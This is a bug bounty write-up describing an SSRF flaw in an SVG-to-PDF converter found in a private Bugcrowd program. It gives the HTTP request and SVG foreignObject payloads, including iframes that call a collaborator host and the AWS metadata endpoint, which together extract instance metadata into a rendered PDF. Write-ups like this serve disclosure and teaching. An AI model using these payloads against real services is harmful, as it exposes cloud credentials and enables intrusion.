بسم الله الرحمن الرحيم
Some Information on this Post such as Target URL, Endpoint, and several others was modified due to Protect the Privacy of the Program
A few times ago, I had the opportunity to do Bug Hunting activities in one of the Private Programs a Bugcrowd. In this program, there is a complex application with various features. One of the highlights is converting objects to PDF, JPG, PNG files from SVG.
I. Initial Test - Sending HTML Tag
When I found a feature to create PDFs from data inputted by the user, I immediately conducted an experiment to carry out SSRF attacks by changing the SVG code that was sent to HTML containing the iframe tag, which was directed to the Burp Collaborator.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
POST /convert HTTP/2
Host: target.com
Cookie: -
Content-Length: -
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
Dnt: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqBdAsEtYaBjTArl3
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Accept-Encoding: gzip, deflate
Accept-Language: id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7,eu;q=0.6,ms;q=0.5
Connection: close
------WebKitFormBoundaryqBdAsEtYaBjTArl3
Content-Disposition: form-data; name="svg"
<iframe src="http://169.254.169.254/latest/meta-data/"></iframe>
------WebKitFormBoundaryqBdAsEtYaBjTArl3--
But unfortunately, the server responded with an error message.
1
{"message": "Error when converting data."}
It looks like the server can only process input that is a valid SVG file.
II. Embedding HTML using foreignObject
After doing some googling, I found that we can embed the HTML code into the SVG code using an element named foreignObject.
The
SVG element includes elements from a different XML namespace. In the context of a browser, it is most likely (X)HTML.
Source: https://developer.mozilla.org/en-US/docs/Web/SVG/Element/foreignObject
So I changed the payload to be like this:
1
2
3
4
5
6
7
8
9
<svg xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" class="root" width="800" height="500">
<g>
<foreignObject width="800" height="500">
<body xmlns="http://www.w3.org/1999/xhtml">
<iframe src="http://redacted.burpcollaborator.net" width="800" height="500"></iframe>
</body>
</foreignObject>
</g>
</svg>
After getting a hit on the Burp Collaborator Client, I checked the IP address used, and it turned out that the application uses Amazon Web Service and from the User Agent I notice that the SVG is rendered using PhantomJS.
So I modified the payload to exfiltrate the Metadata on the AWS Instance.
1
2
3
4
5
6
7
8
9
<svg xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" class="root" width="800" height="500">
<g>
<foreignObject width="800" height="500">
<body xmlns="http://www.w3.org/1999/xhtml">
<iframe src="http://169.254.169.254/latest/meta-data/" width="800" height="500"></iframe>
</body>
</foreignObject>
</g>
</svg>
And metadata was successfully obtained.
Figure 1 - Retrieving AWS Metadata via PDF File
I immediately reported this finding, marked as P1 and was rewarded $2,150.